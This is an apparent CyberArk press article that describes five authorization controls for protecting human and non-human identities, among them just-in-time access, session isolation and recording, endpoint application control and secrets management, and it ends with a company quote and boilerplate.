The number of human and non-human identities in organizations is growing rapidly, and sooner or later each of these identities will need access to critical resources. This makes them extremely attractive to cybercriminals.
The days when only a few administrators had extensive permissions in company IT infrastructures are long gone. Most employees, applications and devices now also require such rights in order to access critical resources that they need in their everyday work. The classic definition of privileged identities therefore no longer applies, because ultimately every identity can be privileged and requires special protection. To reliably protect all identities across all infrastructures, systems and applications, companies need the following five intelligent authorization controls:
Zero Standing Privileges (ZSP) and Just-in-Time Access (JIT)
Many companies permanently provide users with extensive authorizations, even if they rarely or never need the rights. The identities are not managed consistently over their entire lifecycle and authorizations are therefore not revoked if they are not used. It is better to assign privileged access rights just-in-time, so that users are only given extended permissions when they actually need them for a specific task. The challenge is to only grant permissions for a defined period of time and then remove them again. Otherwise, rights will accumulate, which will turn users into “super users” over time. The most modern way of assigning permissions is to provide users with zero standing privileges by default, so that they have no permissions in the target applications. Using attribute-based access control policies (ABAC), extended permissions are assigned during user access at runtime and automatically removed after the session.
session isolation
Session isolation protects privileged access by routing traffic between the user's device and the critical resources they access through a proxy server. This means there is no direct connection and in the event of an attack on the user, the risk that the remote system will also be compromised is reduced.
Protection and recording of sessions
The proxy server can serve as an additional control point that monitors and records the session. All activities are recorded - down to individual mouse clicks within a web application or on a server. The activities can be analyzed automatically to detect unusual activities that indicate a threat. In such a case, the session will be interrupted immediately.
Application control on the endpoint
Comprehensive, policy-based application control helps protect endpoints and create a secure work environment for every user group. It enforces least privilege principles on endpoints and takes into account the application context and various parameters to decide whether to allow or block the execution of applications, scripts and other activities.
Credentials and Secrets Management
Credentials such as usernames and passwords are necessary to reliably identify identities. Credential management not only manages passwords, keys and other credentials, but also monitors compliance with password guidelines and rotates passwords or keys according to defined specifications, such as a schedule or certain events. Secrets management allows similar security policies to be enforced for non-human identities, such as those used in bots, scripts, cloud applications and IoT devices.
“Cyber attacks on all types of identities are continually increasing and becoming more sophisticated,” emphasizes Fabian Hotarek, Solutions Engineering Manager at CyberArk. “That’s why organizations need a thoughtful identity security strategy with intelligent permission controls to protect human and non-human identities and minimize the risk associated with credential theft and privilege abuse.”
More at Cyberark.com
About CyberArk CyberArk is the global leader in identity security. With Privileged Access Management as a core component, CyberArk provides comprehensive security for any identity - human or non-human - across business applications, distributed work environments, hybrid cloud workloads and DevOps lifecycles. The world's leading companies rely on CyberArk to secure their most critical data, infrastructure and applications. Around a third of the DAX 30 and 20 of the Euro Stoxx 50 companies use CyberArk's solutions.
Matching articles on the topic